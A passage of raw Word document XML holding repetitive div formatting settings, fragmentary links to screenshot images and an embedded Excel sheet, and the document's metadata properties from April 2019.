      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1165166473">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1167749255">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1233616170">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1298876625">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1314943495">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1380200147">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1383335379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1835074602">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1276525802">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1115708685">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="480583101">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="1884516835">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="1007438255">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="1538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2692">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1462655047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1467316339">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1485857485">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1516117708">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1532258949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565483104">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1603567485">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1613365509">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1634407314">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1746147686">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1809391780">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1822387740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1825199723">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1837186573">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1859469307">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1919748522">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1931696114">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1962027638">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1997298905">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2009628230">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2041005199">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2082369171">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2094470342">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2095012323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2129659052">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="607585609">
          <w:marLeft w:val="706"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="782072579">
          <w:marLeft w:val="706"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2133547948">
          <w:marLeft w:val="706"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="910895771">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3001.net/2012/10/13.p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image.3001.net/2012/10/Screenshot-3.png"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age.3001.net/2012/10/Screenshot-2.pn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Microsoft_Excel_97-2003____1.xls"/><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E2D14-7CAD-4C1A-924B-D24560F7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13828</Words>
  <Characters>78826</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>656</Lines>
  <Paragraphs>184</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-08T01:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-08T01:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>